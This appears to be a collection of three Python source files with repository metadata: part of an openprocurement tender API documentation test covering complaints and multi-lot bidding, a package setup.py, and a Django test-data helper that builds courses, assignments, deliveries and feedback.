with open('docs/source/tutorial/award-complaint-accepted-stopped.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/awards/{}/complaints/{}'.format(self.tender_id, award_id, complaint5_id), {"data": {
"decision": "Тендер скасовується замовником",
"status": "stopped"
}})
self.assertEqual(response.status, '200 OK')
with open('docs/source/tutorial/award-complaints-list.http', 'w') as self.app.file_obj:
self.app.authorization = None
response = self.app.get('/tenders/{}/awards/{}/complaints'.format(self.tender_id, award_id))
self.assertEqual(response.status, '200 OK')
with open('docs/source/tutorial/award-complaint.http', 'w') as self.app.file_obj:
self.app.authorization = None
response = self.app.get('/tenders/{}/awards/{}/complaints/{}'.format(self.tender_id, award_id, complaint1_id))
self.assertEqual(response.status, '200 OK')
self.app.authorization = ('Basic', ('broker', ''))
with open('docs/source/tutorial/award-complaint-satisfied-resolving.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/awards/{}?acc_token={}'.format(self.tender_id, award_id, owner_token), {"data": {
"status": "cancelled"
}})
self.assertEqual(response.status, '200 OK')
new_award_id = response.headers['Location'][-32:]
with open('docs/source/tutorial/award-complaint-resolved.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/awards/{}/complaints/{}?acc_token={}'.format(self.tender_id, award_id, complaint1_id, owner_token), {"data": {
"tendererAction": "Умови виправлено, вибір переможня буде розгянуто повторно",
"status": "resolved"
}})
self.assertEqual(response.status, '200 OK')
with open('docs/source/tutorial/award-complaint-accepted-stopping.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/awards/{}/complaints/{}?acc_token={}'.format(self.tender_id, award_id, complaint4_id, complaint4_token), {"data": {
"cancellationReason": "Тендер скасовується замовником",
"status": "stopping"
}})
self.assertEqual(response.status, '200 OK')
self.app.authorization = ('Basic', ('reviewer', ''))
with open('docs/source/tutorial/award-complaint-stopping-stopped.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/awards/{}/complaints/{}'.format(self.tender_id, award_id, complaint4_id), {"data": {
"decision": "Тендер скасовується замовником",
"status": "stopped"
}})
self.assertEqual(response.status, '200 OK')
self.app.authorization = ('Basic', ('broker', ''))
award_id = new_award_id
self.app.patch_json('/tenders/{}/awards/{}?acc_token={}'.format(self.tender_id, award_id, owner_token), {"data": {"status": "active"}})
self.assertEqual(response.status, '200 OK')
with open('docs/source/tutorial/award-complaint-submit.http', 'w') as self.app.file_obj:
response = self.app.post_json('/tenders/{}/awards/{}/complaints?acc_token={}'.format(self.tender_id, award_id, bid_token), complaint)
self.assertEqual(response.status, '201 Created')
with open('docs/source/tutorial/award-complaint-cancel.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/awards/{}/complaints/{}?acc_token={}'.format(self.tender_id, award_id, response.json['data']['id'], response.json['access']['token']), {"data": {
"cancellationReason": "Умови виправлено",
"status": "cancelled"
}})
self.assertEqual(response.status, '200 OK')
def test_multiple_lots(self):
request_path = '/tenders?opt_pretty=1'
#### Exploring basic rules
#
with open('docs/source/multiple_lots_tutorial/tender-listing.http', 'w') as self.app.file_obj:
self.app.authorization = None
response = self.app.get(request_path)
self.assertEqual(response.status, '200 OK')
self.app.file_obj.write("\n")
#### Creating tender
#
self.app.authorization = ('Basic', ('broker', ''))
with open('docs/source/multiple_lots_tutorial/tender-post-attempt-json-data.http', 'w') as self.app.file_obj:
response = self.app.post_json('/tenders?opt_pretty=1', {"data": test_tender_data})
self.assertEqual(response.status, '201 Created')
tender = response.json['data']
tender_id = self.tender_id = tender['id']
owner_token = response.json['access']['token']
# add lots
with open('docs/source/multiple_lots_tutorial/tender-add-lot.http', 'w') as self.app.file_obj:
response = self.app.post_json('/tenders/{}/lots?acc_token={}'.format(tender_id, owner_token), {'data': test_lots[0]})
self.assertEqual(response.status, '201 Created')
lot_id1 = response.json['data']['id']
response = self.app.post_json('/tenders/{}/lots?acc_token={}'.format(tender_id, owner_token), {'data': test_lots[1]})
self.assertEqual(response.status, '201 Created')
lot_id2 = response.json['data']['id']
# add relatedLot for item
with open('docs/source/multiple_lots_tutorial/tender-add-relatedLot-to-item.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender_id, owner_token), {"data": {"items": [{'relatedLot': lot_id1}, {'relatedLot': lot_id2}]}})
self.assertEqual(response.status, '200 OK')
with open('docs/source/multiple_lots_tutorial/tender-listing-no-auth.http', 'w') as self.app.file_obj:
self.app.authorization = None
response = self.app.get(request_path)
self.assertEqual(response.status, '200 OK')
with open('docs/source/multiple_lots_tutorial/tender-view.http', 'w') as self.app.file_obj:
response = self.app.get('/tenders/{}'.format(tender['id']))
self.assertEqual(response.status, '200 OK')
self.app.authorization = ('Basic', ('broker', ''))
with open('docs/source/multiple_lots_tutorial/bid-lot1.http', 'w') as self.app.file_obj:
response = self.app.post_json('/tenders/{}/bids'.format(tender_id),
{'data': {
'tenderers': bid['data']["tenderers"], 'lotValues': [{
"value": {"amount": 500}, 'relatedLot': lot_id1}]}})
self.assertEqual(response.status, '201 Created')
bid1_token = response.json['access']['token']
bid1_id = response.json['data']['id']
with open('docs/source/multiple_lots_tutorial/bid-lot2.http', 'w') as self.app.file_obj:
response = self.app.post_json('/tenders/{}/bids'.format(tender_id),
{'data': {
'tenderers': bid2['data']["tenderers"],
'lotValues': [{"value": {"amount": 500}, 'relatedLot': lot_id1}, { "value": {"amount": 500}, 'relatedLot': lot_id2}]}})
self.assertEqual(response.status, '201 Created')
bid2_id = response.json['data']['id']
bid2_token = response.json['access']['token']
with open('docs/source/multiple_lots_tutorial/tender-invalid-all-bids.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/lots/{}?acc_token={}'.format(tender_id, lot_id2, owner_token), {'data': {'value': {'amount': 400}}})
self.assertEqual(response.status, '200 OK')
with open('docs/source/multiple_lots_tutorial/bid-lot1-invalid-view.http', 'w') as self.app.file_obj:
response = self.app.get('/tenders/{}/bids/{}?acc_token={}'.format(tender_id, bid1_id, bid1_token))
self.assertEqual(response.status, '200 OK')
with open('docs/source/multiple_lots_tutorial/bid-lot1-update-view.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/bids/{}?acc_token={}'.format(tender_id, bid1_id, bid1_token),
{'data': {'lotValues': [{
"value": {"amount": 500}, 'relatedLot': lot_id1}], 'status': 'pending'}})
self.assertEqual(response.status, '200 OK')
with open('docs/source/multiple_lots_tutorial/bid-lot2-update-view.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/bids/{}?acc_token={}'.format(tender_id, bid2_id, bid2_token),
{'data': {'lotValues': [{"value": {"amount": 500}, 'relatedLot': lot_id1}], 'status': 'pending'}})
self.assertEqual(response.status, '200 OK')
# switch to active.pre-qualification
self.time_shift('active.pre-qualification')
self.check_chronograph()
with open('docs/source/multiple_lots_tutorial/tender-view-pre-qualification.http', 'w') as self.app.file_obj:
response = self.app.get('/tenders/{}?acc_token={}'.format(tender_id, owner_token))
self.assertEqual(response.status, '200 OK')
with open('docs/source/multiple_lots_tutorial/qualifications-view.http', 'w') as self.app.file_obj:
response = self.app.get('/tenders/{}/qualifications?acc_token={}'.format(self.tender_id, owner_token))
self.assertEqual(response.content_type, 'application/json')
qualifications = response.json['data']
with open('docs/source/multiple_lots_tutorial/tender-activate-qualifications.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/qualifications/{}?acc_token={}'.format(self.tender_id, qualifications[0]['id'], owner_token),
{"data": {'status': 'active'}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']['status'], 'active')
response = self.app.patch_json('/tenders/{}/qualifications/{}?acc_token={}'.format(self.tender_id, qualifications[1]['id'], owner_token),
{"data": {'status': 'active'}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']['status'], 'active')
with open('docs/source/multiple_lots_tutorial/tender-view-pre-qualification-stand-still.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender_id, owner_token),
{"data": {"status": "active.pre-qualification.stand-still"}})
self.assertEqual(response.status, "200 OK")
| {
"content_hash": "91730f182087ea4c138c09cd71f2bb12",
"timestamp": "",
"source": "github",
"line_count": 1621,
"max_line_length": 218,
"avg_line_length": 52.69956816779766,
"alnum_prop": 0.5818369114789408,
"repo_name": "rialto-px/openprocurement.tender.twostage",
"id": "3c1d6d98693e97fb9512c794afc79e64ee1172e5",
"size": "86987",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "docs.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "1173747"
}
],
"symlink_target": ""
} |
import os
from setuptools import find_packages, setup
with open(os.path.join(os.path.dirname(__file__), 'README.md')) as readme:
README = readme.read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
setup(
name='classdirectory',
version='0.1.2',
packages=find_packages(exclude=['ez_setup']),
include_package_data=True,
license='MIT',
description='Find classmates in module.',
long_description=README,
url='https://github.com/fly/classdirectory',
author='Jon Chen',
author_email='bsd@voltaire.sh',
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
],
)
| {
"content_hash": "c4627138399d0e651f6dbeff23c8c589",
"timestamp": "",
"source": "github",
"line_count": 32,
"max_line_length": 78,
"avg_line_length": 32.25,
"alnum_prop": 0.6346899224806202,
"repo_name": "bsdlp/classdirectory",
"id": "19942877a03d76d6f264f10cf4057eeec74e3f6f",
"size": "1055",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "3022"
}
],
"symlink_target": ""
} |
from datetime import datetime, timedelta
from django.contrib.auth.models import User
from models import (Node, Subject, Period, Assignment, AssignmentGroup,
Candidate, Deadline, Delivery, StaticFeedback, FileMeta)
from deliverystore import MemoryDeliveryStore
from django.core.exceptions import ValidationError
class TestHelper(object):
"""
This class helps generate test data.
"""
class IllegalTypeException(Exception):
pass
@classmethod
def set_memory_deliverystore(cls):
FileMeta.deliverystore = MemoryDeliveryStore()
def create_user(self, name):
user = User(username=name)
user.set_password('test')
user.full_clean()
user.save()
vars(self)[name] = user
def refresh_var(self, obj):
freshed_obj = type(obj).objects.get(pk=obj.pk)
for key in vars(self).keys():
if vars(self)[key] == obj:
vars(self)[key] = freshed_obj
def create_superuser(self, name):
su = User(username=name, is_superuser=True)
su.set_password("test")
su.full_clean()
su.save()
vars(self)[name] = su
def add_delivery(self, assignmentgroup, files={}, after_last_deadline=False, delivered_by=None, successful=True):
"""
:param assignmentgroup: Expects either a Delivery object or a
string path to an assignmentgroup. This is a mandatory parameter.
:param files: a dictionary with key/values as file name and
file content as described in Delivery.add_file()
:param after_last_deadline: if true, sets time_of_delivery 1
day later than the assignmentgroups active deadline
"""
# TODO: add timestamp-parameter for time_of_delivery
if assignmentgroup == None:
return
# Check if we're given a group, or fetch from a path
if type(assignmentgroup) == AssignmentGroup:
group = assignmentgroup
elif type(assignmentgroup) == str:
group = self.get_object_from_path(assignmentgroup)
# Get the user/candidate to deliver
delivered_by_to_use = None
if delivered_by:
if type(delivered_by) == User:
for can in group.candidates.all():
if can.student.username == delivered_by.username:
delivered_by_to_use = can
break
elif type(delivered_by) == Candidate:
for can in group.candidates.all():
if can.student.username == delivered_by.student.username:
delivered_by_to_use = can
break
else:
raise self.IllegalTypeException("delivered_by must be either a User or a Candidate.")
else:
delivered_by_to_use = group.candidates.all()[0]
# Create the delivery
#delivery = group.deliveries.create(delivered_by=delivered_by_to_use, successful=False)
delivery = group.get_active_deadline().deliveries.create(delivered_by=delivered_by_to_use, successful=False)
# add files if there are any
for filename in files.keys():
delivery.add_file(filename, files[filename])
if after_last_deadline:
# set the deliverytime to after the deadline
delivery.time_of_delivery = group.get_active_deadline().deadline + timedelta(days=1)
delivery.successful = successful
delivery.full_clean()
delivery.save()
# add it to the groups delivery list
prefix = (group.parentnode.parentnode.parentnode.short_name + '_' + # subject_
group.parentnode.parentnode.short_name + '_' + # period_
group.parentnode.short_name + '_' + # assignment_
group.name + '_')
varname = prefix + 'deliveries'
if varname in vars(self).keys():
vars(self)[varname].append(delivery)
else:
vars(self)[varname] = [delivery]
# adds a variable with the name formatted as:
# subject_period_assignment_group_deadline<X>_delivery<Y>
# where X is the deadline the delivery belongs to, and Y is
# a number that starts at 1 and increments for each new delivery
prefix = prefix + 'deadline' + str(group.deadlines.count()) + '_'
deadline_num = group.get_active_deadline().deliveries.count()
vars(self)[prefix + 'delivery' + str(deadline_num)] = delivery
return delivery
def add_feedback(self, delivery=None, verdict=None, examiner=None, timestamp=None):
"""
:param delivery: either a Delivery object or a string path to
an assignmentgroup, where we take the last delivery made. This
is the only mandatory parameter
:param verdict: a dict containing grade, score and passing
grade. Defaults to grade='A', points=100,
is_passing_grade=True
:param examiner: A User object. Defaults to the first examiner
for the delivery's assignment group.
:param timestamp: A datetime object for when the feedback was
saved. Defaults to same time the delivery was made
"""
# get the delivery object
if type(delivery) == str:
# since we cant create a path directly to a delivery,
# expect an assignmentgroup path
delivery = self.get_object_from_path(delivery)
# if the path led to an AssignmentGroup, get that groups
# latest delivery
if type(delivery) == AssignmentGroup:
delivery = delivery.get_active_deadline().deliveries.all().order_by('time_of_delivery')[0]
# if none of the above, expect we were given a Delivery
if not type(delivery) == Delivery:
raise ValueError('Invalid delivery given. Got ' + delivery)
# get the verdict
if not verdict:
verdict = {'grade': 'A', 'points': 100, 'is_passing_grade': True}
# get the examiner
if not examiner:
examiner = delivery.deadline.assignment_group.examiners.all()[0].user
# get the timestamp
if not timestamp:
timestamp = delivery.deadline.assignment_group.get_active_deadline().deadline
# create the feedback
feedback = StaticFeedback(saved_by=examiner, delivery=delivery, grade=verdict['grade'],
points=verdict['points'], is_passing_grade=verdict['is_passing_grade'],
rendered_view='This is a default static feedback')
# and finally, save it!
try:
feedback.full_clean()
feedback.save()
except ValidationError:
raise
# add it to the groups feedbacks list
varname = (delivery.deadline.assignment_group.parentnode.parentnode.parentnode.short_name + '_' + # subject_
delivery.deadline.assignment_group.parentnode.parentnode.short_name + '_' + # period_
delivery.deadline.assignment_group.parentnode.short_name + '_' + # assignment_
delivery.deadline.assignment_group.name + '_feedbacks')
if varname in vars(self).keys():
vars(self)[varname].append(feedback)
else:
vars(self)[varname] = [feedback]
return feedback
def _parse_extras(self, text, allowed_extras=[]):
"""Parse an 'extras' string. Separate at ':', and create a
key/value pair of name/value
"""
res = {}
for extra in allowed_extras:
res[extra] = []
# res = {'admin': [], 'examiner': [], 'candidate': [], 'when': []}
if not text:
return res
sections = text.split(':')
for section in sections:
key = section[:section.index('(')]
if key not in res:
raise ValueError("{0} is not an allowed command.".format(key))
res[key] = section[section.index('(') + 1 : section.index(')')].split(',')
return res
def _create_or_add_user(self, name):
user = User(username=name, email="%s@example.com" % name.strip())
user.set_password("test")
try:
user.full_clean()
user.save()
except ValidationError:
user = User.objects.get(username=name)
vars(self)[user.username] = user
return user
#######
##
## Node specifics
##
#######
def _create_or_add_node(self, parent, name, users):
node = Node(parentnode=parent, short_name=name, long_name=name.capitalize())
try:
node.full_clean()
node.save()
except ValidationError:
node = Node.objects.get(parentnode=parent, short_name=name)
# allowed roles in node are:
for admin in users['admin']:
node.admins.add(self._create_or_add_user(admin))
if users['ln']:
node.long_name = users['ln'][0]
node.full_clean()
node.save()
vars(self)[node.get_path().replace('.', '_')] = node
return node
def _do_the_nodes(self, nodes):
if not nodes:
return None
new_node = None
# separate the nodes
prev_node = None
for n in nodes.split('.'):
# initialize the admin-argument
try:
node_name, extras_arg = n.split(':', 1)
except ValueError:
node_name = n
extras_arg = None
users = self._parse_extras(extras_arg, ['admin', 'ln'])
new_node = self._create_or_add_node(prev_node, node_name, users)
prev_node = new_node
return new_node
#######
##
## Subject specifics
##
#######
def _create_or_add_subject(self, subject_name, parentnode, extras):
subject = Subject(parentnode=parentnode, short_name=subject_name, long_name=subject_name.capitalize())
try:
subject.full_clean()
subject.save()
except ValidationError:
subject = Subject.objects.get(short_name=subject_name)
# add the extras (only admins allowed in subject)
for admin in extras['admin']:
subject.admins.add(self._create_or_add_user(admin))
# if a long_name is given, set it
if extras['ln']:
subject.long_name = extras['ln'][0]
subject.full_clean()
subject.save()
vars(self)[subject.short_name] = subject
return subject
def _do_the_subjects(self, node, subject_list):
# if not node:
# raise ValueError('No nodes created. Subjects needs node-parents')
created_subjects = []
for subject in subject_list:
try:
subject_name, extras_arg = subject.split(':', 1)
except ValueError:
subject_name = subject
extras_arg = None
users = self._parse_extras(extras_arg, ['admin', 'ln'])
new_subject = self._create_or_add_subject(subject_name, node, users)
created_subjects.append(new_subject)
return created_subjects
#######
##
## Period specifics
##
#######
def _create_or_add_period(self, period_name, parentnode, extras):
period = Period(parentnode=parentnode, short_name=period_name, long_name=period_name.capitalize(),
start_time=datetime.now(), end_time=datetime.now() + timedelta(days=5 * 30))
try:
period.full_clean()
period.save()
except ValidationError:
period = Period.objects.get(parentnode=parentnode, short_name=period_name)
# add the extras (only admins allowed in subject)
for admin in extras['admin']:
period.admins.add(self._create_or_add_user(admin))
if extras['begins']:
period.start_time = datetime.now() + timedelta(days=int(extras['begins'][0]) * 30)
if extras['ends']:
period.end_time = period.start_time + timedelta(days=int(extras['ends'][0]) * 30)
elif extras['begins'] and not extras['ends']:
period.end_time = period.start_time + timedelta(5 * 30)
if extras['ln']:
period.long_name = extras['ln'][0]
period.full_clean()
period.save()
vars(self)[parentnode.short_name + '_' + period.short_name] = period
return period
def _do_the_periods(self, subjects, periods_list):
# if not subjects:
# subjects = Subject.objects.all()
# if not subjects:
# raise ValueError("No subjects created. Periods needs subject-parents")
created_periods = []
for subject in subjects:
for period in periods_list:
try:
period_name, extras_arg = period.split(':', 1)
except ValueError:
period_name = period
extras_arg = None
extras = self._parse_extras(extras_arg, ['admin', 'begins', 'ends', 'ln'])
new_period = self._create_or_add_period(period_name, subject, extras)
created_periods.append(new_period)
return created_periods
#######
##
## Assignment specifics
##
#######
def _create_or_add_assignment(self, assignment_name, parentnode, extras):
assignment = Assignment(parentnode=parentnode, short_name=assignment_name,
long_name=assignment_name.capitalize(), publishing_time=parentnode.start_time)
try:
assignment.full_clean()
assignment.save()
except ValidationError:
assignment = Assignment.objects.get(parentnode=parentnode,
short_name=assignment_name)
# add the users (only admins allowed in subject)
for admin in extras['admin']:
assignment.admins.add(self._create_or_add_user(admin))
if extras['pub']:
assignment.publishing_time += timedelta(days=int(extras['pub'][0]))
if extras['anon']:
if extras['anon'][0] == 'true':
assignment.anonymous = True
elif extras['anon'][0] == 'false':
assignment.anonymous = False
else:
raise ValueError("anon must be 'true' or 'false'")
assignment.full_clean()
assignment.save()
vars(self)[parentnode.parentnode.short_name + '_' + # subject
parentnode.short_name + '_' + # period
assignment.short_name] = assignment
return assignment
def _do_the_assignments(self, periods, assignments_list):
# if not periods:
# periods = Period.objects.all()
# if not periods:
# raise ValueError("No periods created. Assignments needs a period-parent")
created_assignments = []
for period in periods:
for assignment in assignments_list:
try:
assignment_name, extras_arg = assignment.split(':', 1)
except ValueError:
assignment_name = assignment
extras_arg = None
users = self._parse_extras(extras_arg, ['admin', 'pub', 'anon'])
new_assignment = self._create_or_add_assignment(assignment_name, period, users)
created_assignments.append(new_assignment)
return created_assignments
#######
##
## Assignmentgroups specifics
##
#######
def _create_or_add_assignmentgroup(self, group_name, parentnode, extras):
if AssignmentGroup.objects.filter(parentnode=parentnode, name=group_name).count() == 1:
group = AssignmentGroup.objects.get(parentnode=parentnode, name=group_name)
else:
group = AssignmentGroup(parentnode=parentnode, name=group_name)
try:
group.full_clean()
group.save()
except ValidationError:
raise ValueError("Assignmentgroup not created!")
# add the extras (only admins allowed in subject)
for candidate in extras['candidate']:
try:
candidate_name, cid = candidate.split(';', 1)
except ValueError:
candidate_name = candidate
cid = None
group.candidates.add(Candidate(student=self._create_or_add_user(candidate_name)))
cand = group.candidates.order_by('-id')[0]
#cand.candidate_id = cid if cid != None else str(cand.student.id)
cand.candidate_id = cid
cand.update_identifier(parentnode.anonymous)
cand.full_clean()
cand.save()
for examiner in extras['examiner']:
group.examiners.create(user=self._create_or_add_user(examiner))
group.full_clean()
group.save()
vars(self)[parentnode.parentnode.parentnode.short_name + '_' + # subject_
parentnode.parentnode.short_name + '_' + # period_
parentnode.short_name + '_' + # assignment_
group_name] = group
# # create the default deadline, deadline0, variable
# vars(self)[parentnode.parentnode.parentnode.short_name + '_' + # subject_
# parentnode.parentnode.short_name + '_' + # period_
# parentnode.short_name + '_' + # assignment_
# group_name + '_deadline0'] = group.deadlines.all()[0]
return group
def _do_the_assignmentgroups(self, assignments, assignmentgroups_list):
# if not assignments:
# assignments = Assignment.objects.all()
# if not assignments:
# raise ValueError("No periods created. Assignments needs a period-parent")
created_groups = []
for assignment in assignments:
for group in assignmentgroups_list:
try:
group_name, extras_arg = group.split(':', 1)
except ValueError:
group_name = group
extras_arg = None
users = self._parse_extras(extras_arg, ['examiner', 'candidate', 'candidate_id'])
new_group = self._create_or_add_assignmentgroup(group_name, assignment, users)
created_groups.append(new_group)
return created_groups
#######
##
## Deadlines specifics
##
#######
def _create_or_add_deadline(self, deadline_name, parentnode, extras):
deadline = Deadline(assignment_group=parentnode, deadline=parentnode.parentnode.publishing_time + timedelta(days=10))
try:
deadline.full_clean()
deadline.save()
except ValidationError:
raise ValueError("something impossible happened when creating deadline")
if extras['ends']:
deadline.deadline = parentnode.parentnode.publishing_time + timedelta(int(extras['ends'][0]))
if extras['text']:
deadline.text = extras['text'][0]
# create the variable ref'ing directly to the deadline
prefix = (parentnode.parentnode.parentnode.parentnode.short_name + '_' + # subject_
parentnode.parentnode.parentnode.short_name + '_' + # period_
parentnode.parentnode.short_name + '_' + # assignment_
parentnode.name + '_')
deadline.full_clean()
deadline.save()
# only create this variable if a name is given
if deadline_name:
varname = prefix + deadline_name
vars(self)[varname] = deadline
# Add or append to the deadlines list. Last element will be
# the same as the most recently created deadline, stored in
# prefix+deadline_name
vardict = prefix + 'deadlines'
if vardict in vars(self).keys():
vars(self)[vardict].append(deadline)
else:
vars(self)[vardict] = [deadline]
# Create a variable with the name formatted as:
# subject_period_assignment_group_deadline<X> where X
# starts at 1 and increments for each deadline added to
# this group
vars(self)[prefix + 'deadline' + str(len(vars(self)[vardict]))] = deadline
# check if the default deadline, deadline0, variable exists
default_deadline_var = prefix + 'deadline0'
if default_deadline_var not in vars(self).keys():
vars(self)[default_deadline_var] = parentnode.deadlines.order_by('deadline')[0]
return deadline
def _do_the_deadlines(self, assignmentgroups, deadlines_list):
created_deadlines = []
for assignmentgroup in assignmentgroups:
for deadline_ in deadlines_list:
try:
deadline_name, extras_arg = deadline_.split(':', 1)
except ValueError:
deadline_name = deadline_
extras_arg = None
extras = self._parse_extras(extras_arg, ['ends', 'text'])
new_deadline = self._create_or_add_deadline(deadline_name, assignmentgroup, extras)
created_deadlines.append(new_deadline)
return created_deadlines
def _validate_args(self, args):
i = 0
while i < len(args):
arg = args[i]
i += 1
# look for the first none
if not arg:
while i < len(args):
# if any args are not-None, return false
if args[i]:
return False
i += 1
return True
def add(self, nodes=None, subjects=None, periods=None, assignments=None, assignmentgroups=None,
delivery=None, feedback=None, deadlines=None):
# see if any of the parameters 'below' are !None
args = [subjects, periods, assignments, assignmentgroups, deadlines, delivery, feedback]
if not self._validate_args(args):
raise ValueError('Invalid parameters. ')
if not nodes:
return
nodes = self._do_the_nodes(nodes)
if not subjects:
return
subjects = self._do_the_subjects(nodes, subjects)
if not periods:
return
periods = self._do_the_periods(subjects, periods)
if not assignments:
return
assignments = self._do_the_assignments(periods, assignments)
if not assignmentgroups:
return
assignmentgroups = self._do_the_assignmentgroups(assignments, assignmentgroups)
if not deadlines:
return
deadlines = self._do_the_deadlines(assignmentgroups, deadlines)
# splits up a dot separated path, and calls add() with those
# pieces as arguments
def add_to_path(self, path):
nodes = None
subjects = None
periods = None
assignments = None
assignmentgroups = None
deadlines = None
nodes, rest = path.split(';', 1)
split_rest = rest.split('.')
split_rest.reverse()
if split_rest:
subjects = [split_rest.pop()]
if split_rest:
periods = [split_rest.pop()]
if split_rest:
assignments = [split_rest.pop()]
if split_rest:
assignmentgroups = [split_rest.pop()]
if split_rest:
deadlines = [split_rest.pop()]
self.add(nodes=nodes, subjects=subjects, periods=periods, assignments=assignments,
assignmentgroups=assignmentgroups, deadlines=deadlines)
def get_object_from_path(self, path):
try:
nodes, rest = path.split(';', 1)
except ValueError:
rest = path
varname = rest.replace('.', '_')
return vars(self)[varname]
def load_generic_scenario(self):
# set up the base structure
self.add(nodes='uni:admin(mortend)',
subjects=['cs101:admin(admin1,admin2):ln(Basic OO programming)',
'cs110:admin(admin3,admin4):ln(Basic scientific programming)',
'cs111:admin(admin1,damin3):ln(Advanced OO programming)'],
periods=['fall11', 'spring11:begins(6)'])
# add 4 assignments to inf101 and inf110 in fall and spring
self.add(nodes='uni',
subjects=['cs101', 'cs110'],
periods=['fall11', 'spring11'],
assignments=['a1', 'a2'])
# add 12 assignments to inf111 fall and spring.
self.add(nodes='uni',
subjects=['cs111'],
periods=['fall11', 'spring11'],
assignments=['week1', 'week2', 'week3', 'week4'])
# set up some students with descriptive names
# inf101 is so easy, everyone passes
self.add_to_path('uni;cs101.fall11.a1.g1:candidate(goodStud1):examiner(examiner1).dl:ends(5)')
self.add_to_path('uni;cs101.fall11.a1.g2:candidate(goodStud2):examiner(examiner1).dl:ends(5)')
self.add_to_path('uni;cs101.fall11.a1.g3:candidate(badStud3):examiner(examiner2).dl:ends(5)')
self.add_to_path('uni;cs101.fall11.a1.g4:candidate(okStud4):examiner(examiner2).dl:ends(5)')
self.add_to_path('uni;cs101.fall11.a2.g1:candidate(goodStud1):examiner(examiner1).dl:ends(5)')
self.add_to_path('uni;cs101.fall11.a2.g2:candidate(goodStud2):examiner(examiner1).dl:ends(5)')
self.add_to_path('uni;cs101.fall11.a2.g3:candidate(badStud3):examiner(examiner2).dl:ends(5)')
self.add_to_path('uni;cs101.fall11.a2.g4:candidate(okStud4):examiner(examiner2).dl:ends(5)')
# inf110 is an easy group-project, everyone passes
self.add_to_path('uni;cs110.fall11.a1.g1:candidate(goodStud1,goodStud2):examiner(examiner1).dl:ends(14)')
self.add_to_path('uni;cs110.fall11.a1.g2:candidate(badStud3,okStud4):examiner(examiner2).dl.ends(14)')
self.add_to_path('uni;cs110.fall11.a2.g1:candidate(goodStud1,goodStud2):examiner(examiner1).dl:ends(14)')
self.add_to_path('uni;cs110.fall11.a2.g2:candidate(badStud3,okStud4):examiner(examiner2).dl.ends(14)')
# inf111 is hard! Everyone passes week1
self.add_to_path('uni;cs111.fall11.week1.g1:candidate(goodStud1):examiner(examiner3).dl:ends(5)')
self.add_to_path('uni;cs111.fall11.week1.g2:candidate(goodStud2):examiner(examiner3).dl:ends(5)')
self.add_to_path('uni;cs111.fall11.week1.g3:candidate(badStud3):examiner(examiner3).dl:ends(5)')
self.add_to_path('uni;cs111.fall11.week1.g4:candidate(okStud4):examiner(examiner3).dl:ends(5)')
# and 2
self.add_to_path('uni;cs111.fall11.week2.g1:candidate(goodStud1):examiner(examiner3).dl:ends(5)')
self.add_to_path('uni;cs111.fall11.week2.g2:candidate(goodStud2):examiner(examiner3).dl:ends(5)')
self.add_to_path('uni;cs111.fall11.week2.g3:candidate(badStud3):examiner(examiner3).dl:ends(5)')
self.add_to_path('uni;cs111.fall11.week2.g4:candidate(okStud4):examiner(examiner3).dl:ends(5)')
# badStud4 fails at week3
self.add_to_path('uni;cs111.fall11.week3.g1:candidate(goodStud1):examiner(examiner3).dl:ends(5)')
self.add_to_path('uni;cs111.fall11.week3.g2:candidate(goodStud2):examiner(examiner3).dl:ends(5)')
self.add_to_path('uni;cs111.fall11.week3.g4:candidate(okStud2):examiner(examiner3).dl:ends(5)')
# and okStud4 fails at week4
self.add_to_path('uni;cs111.fall11.week4.g1:candidate(goodStud1):examiner(examiner3).dl:ends(5)')
self.add_to_path('uni;cs111.fall11.week4.g2:candidate(goodStud2):examiner(examiner3).dl:ends(5)')
# deliveries
goodFile = {'good.py': ['print ', 'awesome']}
okFile = {'ok.py': ['print ', 'meh']}
badFile = {'bad.py': ['print ', 'bah']}
# cs101
self.add_delivery('cs101.fall11.a1.g1', goodFile)
self.add_delivery('cs101.fall11.a1.g2', goodFile)
self.add_delivery('cs101.fall11.a1.g3', badFile)
self.add_delivery('cs101.fall11.a1.g4', okFile)
self.add_delivery('cs101.fall11.a2.g1', goodFile)
self.add_delivery('cs101.fall11.a2.g2', goodFile)
self.add_delivery('cs101.fall11.a2.g3', badFile)
self.add_delivery('cs101.fall11.a2.g4', okFile)
# cs110
self.add_delivery('cs110.fall11.a1.g1', goodFile)
self.add_delivery('cs110.fall11.a1.g1', goodFile)
self.add_delivery('cs110.fall11.a2.g2', badFile)
self.add_delivery('cs110.fall11.a2.g2', okFile)
# cs111
self.add_delivery('cs111.fall11.week1.g1', goodFile)
self.add_delivery('cs111.fall11.week1.g2', goodFile)
self.add_delivery('cs111.fall11.week1.g3', badFile)
self.add_delivery('cs111.fall11.week1.g4', okFile)
# g3's delivery fails here
self.add_delivery('cs111.fall11.week2.g1', goodFile)
self.add_delivery('cs111.fall11.week2.g2', goodFile)
self.add_delivery('cs111.fall11.week2.g3', badFile)
self.add_delivery('cs111.fall11.week2.g4', okFile)
# g4's delivery fails here
self.add_delivery('cs111.fall11.week3.g1', goodFile)
